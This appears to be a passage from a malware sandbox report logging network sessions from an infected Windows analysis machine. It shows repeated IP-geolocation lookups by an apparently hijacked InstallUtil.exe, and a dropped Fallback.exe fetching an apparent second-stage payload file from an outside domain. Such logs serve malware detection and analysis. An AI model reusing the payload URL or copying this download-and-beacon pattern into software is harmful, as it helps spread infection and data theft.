                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2UTcp1UPgLLVg%2Fa4xGkxPquN6s1yNXHJMl31slmQsJEpcQ99rmMUqgN3NxS61oNh%2FaTOKg17f55jzZIFetOnlI%2BfiPSsXzNI9TVZX4RkUZl7cxHJy3kn6TJmsCEXhhwJa6U24%2Bi3"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df501f29bd72cd8-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1519&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1924252&cwnd=245&unsent_bytes=0&cid=2401d78e5d6292c4&ts=471&x=0"
2024-11-08 10:51:24 UTC | 150 | IN | Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
2024-11-08 10:51:24 UTC | 209 | IN | Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49713 | 188.114.96.3 | 443 | 360 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-08 10:51:25 UTC | 63 | OUT | GET /xml/173.254.250.90 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-08 10:51:25 UTC | 1213 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:25 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15800
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uex1WZmoidL0WAcFAeCaIFr81qukra7NHfFGXCCGz1ds4qBjfYq2CNmPJ0m9QMJjcAjd7g31vdyc9UmpImoZWZ2w9AwQlgR4rwsnmuhZEfnI36UZU6BaW%2FL3gnHyq5VepDUXsJra"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df501fd7ae7346d-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1140&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2567375&cwnd=240&unsent_bytes=0&cid=d3a6feea8a7272b1&ts=142&x=0"
2024-11-08 10:51:25 UTC | 156 | IN | Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas
2024-11-08 10:51:25 UTC | 203 | IN | Data Ascii: </RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49715 | 188.114.96.3 | 443 | 360 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-08 10:51:28 UTC | 87 | OUT | GET /xml/173.254.250.90 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-08 10:51:28 UTC | 1223 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:28 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15803
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xDXCkTSfoOUkj6KVtJL6I%2B7DpG2CUAq9Sdts4nX3ZzhLyYs9UzXZ5SWrF%2BkRJI%2BNv0CXOflVYHQv6Nc%2FhQDCC5KVP%2BAF6eMbLD8ICD0BYV5k90gqH3LFNyOe4knkMx%2BwWKHGOIrx"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df5020d7aa63160-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1336&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2019525&cwnd=240&unsent_bytes=0&cid=00aa78db9eb6f03b&ts=433&x=0"
2024-11-08 10:51:28 UTC | 146 | IN | Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
2024-11-08 10:51:28 UTC | 213 | IN | Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49721 | 188.114.96.3 | 443 | 360 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-08 10:51:29 UTC | 63 | OUT | GET /xml/173.254.250.90 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-08 10:51:29 UTC | 1227 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:29 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15804
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XHOBATqOFZoQb4XAKZF2ma2TUaaSPmHB%2F%2B6iBg76yl%2FDGrvTgB4qXtdeMZxGowrD1rtYk%2F2xV5%2BbwT%2B%2F97LjBiBBQEUpSPnMx2WmwEoZRJD5uCblra7%2BYzd1YI8LCfA4xzIn2ACR"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df50217bc0b3594-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1220&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2458404&cwnd=251&unsent_bytes=0&cid=1f06358f3b77a8eb&ts=147&x=0"
2024-11-08 10:51:29 UTC | 142 | IN | Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Re
2024-11-08 10:51:29 UTC | 217 | IN | Data Ascii: gionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            8 | 192.168.2.5 | 49722 | 185.78.221.73 | 443 | 1096 | C:\Users\user\AppData\Roaming\Fallback.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:30 UTC86OUTGET /slim/Knlpdavcfrw.vdf HTTP/1.1
                                                            Host: www.oleonidas.gr
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:31 UTC273INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:30 GMT
                                                            Server: Apache
                                                            Last-Modified: Fri, 08 Nov 2024 05:15:34 GMT
                                                            Accept-Ranges: bytes
                                                            Content-Length: 952328
                                                            Cache-Control: max-age=1209600
                                                            Expires: Fri, 22 Nov 2024 10:51:30 GMT
                                                            Vary: User-Agent
                                                            Connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            9 | 192.168.2.5 | 49737 | 188.114.96.3 | 443 | 360 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:32 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:32 UTC1227INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:32 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15807
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PUGbK%2BKjlFjXhx7OUsaGWRMWPrA9WBhs1nsIC3EMzu1MV7IpBqjAPp91uX%2FzaGt0pfc0Ec5Jl%2FB0t0BtEpWtnyrq2S%2FD7MfvveBO%2BnN60Dx%2F0zj7r3qd8jRr376KN%2BBuED%2BbWgny"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df5022a1ab446dd-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1070&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2688950&cwnd=248&unsent_bytes=0&cid=d301ff2598f78ff0&ts=155&x=0"
                                                            2024-11-08 10:51:32 UTC142INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65
                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Re
                                                            2024-11-08 10:51:32 UTC217INData Raw: 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: gionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            10 | 192.168.2.5 | 49765 | 188.114.96.3 | 443 | 3652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:38 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:38 UTC1219INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:38 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15813
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f3TORudRqUE43%2FRFQ58y15hmQxK1qTmittM0O1rrGINvitcGmjoaf7AwLmYbH09CoSs9yJGDo8tatvtlLAM5rKCKOoKa1Y2LJe1wyfg%2F0ok6FshyYyZ9b19pIe%2BY%2F2o6Y3bqtCPu"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df5024b1f5f6b6a-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1230&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2289328&cwnd=251&unsent_bytes=0&cid=22130bc7f3878e19&ts=194&x=0"
                                                            2024-11-08 10:51:38 UTC150INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65
                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
                                                            2024-11-08 10:51:38 UTC209INData Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            11 | 192.168.2.5 | 49771 | 188.114.96.3 | 443 | 3652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:39 UTC63OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-11-08 10:51:39 UTC1219INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:39 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15814
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GNiTJRoOFhgJdF6MG8Gk2p3YHnna7oSyvIqSjYusM%2BeIOQmNopUYYpCRPE%2FkumUjXmbw5jPCG8rD5MAZN7oxawmz5bFaov6myzHkRRZ1B%2Fr406JdhOd9v%2BfaXJ2clTVpejqByNeX"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df5025159ad283f-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1163&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2187311&cwnd=251&unsent_bytes=0&cid=87f44feff9cc2473&ts=145&x=0"
                                                            2024-11-08 10:51:39 UTC150INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65
                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
                                                            2024-11-08 10:51:39 UTC209INData Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            12 | 192.168.2.5 | 49782 | 188.114.96.3 | 443 | 3652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:40 UTC63OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-11-08 10:51:40 UTC1223INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:40 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15815
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nepmg7z64%2FF0Qqpm5Z5zObkD9UeWEcMluyJffDhTOtxKTW2N%2BpRf6oTCka7v%2BMnxKXJwFZ%2B7ajfHTgkJBk8mNJ%2BVOyAvB9c2OImZZ2wbUPyCSwO7aSJkrQ62Gfn024j0%2BhI29OeS"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df5025b8d0ce987-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1301&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2097031&cwnd=251&unsent_bytes=0&cid=f7d8e2482fb39c43&ts=160&x=0"
                                                            2024-11-08 10:51:40 UTC146INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e
                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
                                                            2024-11-08 10:51:40 UTC213INData Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            13 | 192.168.2.5 | 49791 | 188.114.96.3 | 443 | 3652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:42 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:42 UTC | 1223 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:42 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15817
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
